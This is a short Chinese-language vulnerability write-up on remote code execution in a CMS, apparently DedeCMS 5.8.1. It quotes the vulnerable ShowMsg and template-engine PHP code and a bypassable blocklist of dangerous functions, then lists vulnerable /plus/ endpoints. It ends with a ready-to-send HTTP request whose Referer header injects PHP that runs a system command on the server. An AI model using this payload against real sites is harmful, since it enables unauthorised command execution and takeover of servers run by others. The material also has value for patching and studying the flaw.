某CMS common.func.php 远程命令执行

https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html

https://github.com/dedecms/DedeCMS/releases/tag/v5.8.1

function ShowMsg($msg, $gourl, $onlymsg = 0, $limittime = 0){    if (empty($GLOBALS['cfg_plus_dir'])) {        $GLOBALS['cfg_plus_dir'] = '..';    }    if ($gourl == -1) {        $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';        if ($gourl == "") {            $gourl = -1;        }    }
    $htmlhead = "    <html>rn<head>rn<title>DedeCMS提示信息</title>rn    <meta http-equiv="Content-Type" content="text/html; charset={dede:global.cfg_soft_lang/}" />    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">    <meta name="renderer" content="webkit">    <meta http-equiv="Cache-Control" content="no-siteapp" />    <link rel="stylesheet" type="text/css" href="{dede:global.cfg_assets_dir/}/pkg/uikit/css/uikit.min.css" />    <link rel="stylesheet" type="text/css" href="{dede:global.cfg_assets_dir/}/css/manage.dede.css">    <base target='_self'/>    </head>    <body>    " . (isset($GLOBALS['ucsynlogin']) ? $GLOBALS['ucsynlogin'] : '') . "    <center style="width:450px" class="uk-container">        <div class="uk-card uk-card-small uk-card-default" style="margin-top: 50px;">        <div class="uk-card-header"  style="height:20px">DedeCMS 提示信息！</div>
    <script>rn";    $htmlfoot = "    </script>            </center>        <script src="{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit.min.js"></script>  <script src="{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit-icons.min.js"></script>    </body>rn</html>rn";
    $litime = ($limittime == 0 ? 1000 : $limittime);    $func = '';
    if ($gourl == '-1') {        if ($limittime == 0) {            $litime = 3000;        }
        $gourl = "javascript:history.go(-1);";    }
    if ($gourl == '' || $onlymsg == 1) {        $msg = "<script>alert("" . str_replace(""", "“", $msg) . "");</script>";    } else {        //当网址为:close::objname 时, 关闭父框架的id=objname元素        if (preg_match('/close::/', $gourl)) {            $tgobj = trim(preg_replace('/close::/', '', $gourl));            $gourl = 'javascript:;';            $func .= "window.parent.document.getElementById('{$tgobj}').style.display='none';rn";        }
        $func .= "var pgo=0;      function JumpUrl(){        if(pgo==0){ location='$gourl'; pgo=1; }      }rn";        $rmsg = $func;        $rmsg .= "document.write("<div style='height:130px;font-size:10pt;background:#ffffff'><br />");rn";        $rmsg .= "document.write("" . str_replace(""", "“", $msg) . "");rn";        $rmsg .= "document.write("";
        if ($onlymsg == 0) {            if ($gourl != 'javascript:;' && $gourl != '') {                $rmsg .= "<br /><a href='{$gourl}'>如果你的浏览器没反应，请点击这里...</a>";                $rmsg .= "<br/></div>");rn";                $rmsg .= "setTimeout('JumpUrl()',$litime);";            } else {                $rmsg .= "<br/></div>");rn";            }        } else {            $rmsg .= "<br/><br/></div>");rn";        }        $msg = $htmlhead . $rmsg . $htmlfoot;    }        $tpl = new DedeTemplate();    $tpl->LoadString($msg);    $tpl->Display();}
/** *  获取验证码的session值 * * @return string */

$tpl = new DedeTemplate();$tpl->LoadString($msg);$tpl->Display();

public function Display(){        global $gtmpfile;        extract($GLOBALS, EXTR_SKIP);        $this->WriteCache();        include $this->cacheFile;    }

public function GetResult(){        if (!$this->isParse) {            $this->ParseTemplate();        }        $addset = '';        $addset .= '<' . '?php' . "rn" . 'if(!isset($GLOBALS['_vars'])) $GLOBALS['_vars'] = array(); ' . "rn" . '$fields = array();' . "rn" . '?' . '>';        return preg_replace("/?" . ">[ rnt]{0,}<" . "?php/", "", $addset . $this->sourceString);    }

public function CheckDisabledFunctions($str, &$errmsg = ''){        global $cfg_disable_funs;        $cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite';        // 模板引擎增加disable_functions        if (!defined('DEDEDISFUN')) {            $tokens = token_get_all_nl($str);            $disabled_functions = explode(',', $cfg_disable_funs);            foreach ($tokens as $token) {                if (is_array($token)) {                    if ($token[0] = '306' && in_array($token[1], $disabled_functions)) {                        $errmsg = 'DedeCMS Error:function disabled "' . $token[1] . '" <a href="http://help.dedecms.com/install-use/apply/2013/0711/2324.html" target="_blank">more...</a>';                        return false;                    }                }            }        }        return true;    }

public function Display(){        global $gtmpfile;        extract($GLOBALS, EXTR_SKIP);        $this->WriteCache();        include $this->cacheFile;    }

/plus/flink.php?dopost=save/plus/users_products.php?oid=1337/plus/download.php?aid=1337/plus/showphoto.php?aid=1337/plus/users-do.php?fmdo=sendMail/plus/posttocar.php?id=1337/plus/vote.php?dopost=view/plus/carbuyaction.php?do=clickout/plus/recommend.php........

GET /plus/flink.php?dopost=save HTTP/1.1Host:Accept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36X-Requested-With: XMLHttpRequestReferer: <?php "system"(ls);?>Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close